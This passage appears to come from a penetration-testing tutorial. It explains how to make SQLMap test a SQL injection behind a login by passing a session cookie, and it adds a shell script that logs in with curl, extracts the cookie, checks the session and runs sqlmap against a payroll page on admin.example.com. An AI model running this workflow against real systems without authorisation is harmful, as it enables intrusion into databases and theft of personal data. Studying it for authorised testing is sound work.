SQL injection inside a login-based portal
Sometimes the SQL injection is found inside a portal in the post-login phase, on a page that is only reachable after a valid username and password have been supplied. Most web applications track an authenticated session through an HTTP cookie, so if we hand SQLMap the cookie of an already logged-in session, it sends every test request as that user and can detect and exploit the injection without having to log in itself. Let's try to understand this with an example.

Say there is an administrative portal at http://admin.example.com that asks for a login for a particular user. Once logged in, the user gets access to facilities such as employee payroll management, and you discover an SQL injection in one of those pages. Because the injection is in the post-login phase, SQLMap cannot simply detect it, let alone start to exploit it: an unauthenticated request never reaches the vulnerable code and is simply answered with the login page (or a redirect to it). The cookie must still be valid when SQLMap runs, otherwise SQLMap ends up testing the login page instead of the injectable one. SQLMap has a switch for exactly this case, --cookie, which takes the HTTP cookie as input, so here we can provide the session cookie...
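The procedure the text describes (log in, capture the session cookie, point SQLMap at the post-login page with --cookie), as an added shell example that is not from the book. The login path, the payroll endpoint and its emp_id parameter, the form field names, the credentials and the "Logout" marker are assumptions made for this scenario; only sqlmap's -u, --cookie, -p, --batch and --drop-set-cookie switches and curl's -c, -b, -d options are real.

```shell
#!/bin/sh
# Added example, not from the book. Host, paths, form fields, credentials
# and the post-login marker are assumptions for the scenario on the page.

# Convert a Netscape-format cookie jar (what `curl -c` writes) into the
# single "name=value; name2=value2" string that sqlmap's --cookie expects.
# Jar columns: domain, include-subdomains, path, secure, expiry, name, value.
# Pure comment lines start with '#', but HttpOnly cookies are written with a
# "#HttpOnly_" prefix on the domain and must be kept.
cookie_header_from_jar() {
    awk '/^#HttpOnly_/ || !/^#/ {
            if (NF >= 7) pairs = pairs (pairs == "" ? "" : "; ") $6 "=" $7
         }
         END { print pairs }' "$1"
}

# Build the sqlmap command line for the post-login target as a string.
# --drop-set-cookie keeps sqlmap from merging our session cookie with
# whatever Set-Cookie header the app returns during testing (for example a
# fresh anonymous session when an injected query makes the app log us out).
build_sqlmap_cmd() {
    url=$1; cookie=$2; param=$3
    printf "sqlmap -u '%s' --cookie='%s' -p %s --drop-set-cookie --batch\n" \
        "$url" "$cookie" "$param"
}

# Check that the cookie really buys us a post-login page before spending time
# on sqlmap: fetch the target with the cookie and look for a marker that only
# appears after login. Returns 0 if the session is live.
session_is_live() {
    url=$1; cookie=$2; marker=$3
    curl -s -b "$cookie" "$url" | grep -q "$marker"
}

# Live path: log in, extract the cookie, verify the session, run sqlmap.
exploit_post_login() {
    login_url='http://admin.example.com/login.php'           # assumption
    target='http://admin.example.com/payroll.php?emp_id=1'    # assumption
    jar=$(mktemp)
    curl -s -c "$jar" -d 'username=admin&password=secret' -o /dev/null "$login_url"
    cookie=$(cookie_header_from_jar "$jar")
    rm -f "$jar"
    [ -n "$cookie" ] || { echo "login returned no cookie" >&2; return 1; }
    session_is_live "$target" "$cookie" 'Logout' \
        || { echo "cookie does not give a logged-in page" >&2; return 1; }
    echo "running: $(build_sqlmap_cmd "$target" "$cookie" emp_id)"
    sqlmap -u "$target" --cookie="$cookie" -p emp_id --drop-set-cookie --batch
}

# Offline demonstration on a constructed cookie jar so the script runs
# anywhere; call exploit_post_login against a real target instead.
demo_jar=$(mktemp)
printf '# Netscape HTTP Cookie File\n#HttpOnly_admin.example.com\tFALSE\t/\tFALSE\t0\tPHPSESSID\tabc123\nadmin.example.com\tFALSE\t/\tFALSE\t0\tremember\t1\n' > "$demo_jar"
demo_cookie=$(cookie_header_from_jar "$demo_jar")
rm -f "$demo_jar"
echo "cookie header: $demo_cookie"
build_sqlmap_cmd 'http://admin.example.com/payroll.php?emp_id=1' "$demo_cookie" emp_id
```

The session check before the scan is the step most often skipped: if the cookie has expired or the login failed silently, sqlmap happily tests the login page and reports the target as not injectable. When the logged-in state depends on more than the cookie (custom headers, an anti-CSRF token in every form), capture the complete authenticated request from a proxy and feed it to sqlmap with -r request.txt instead of reconstructing it from switches.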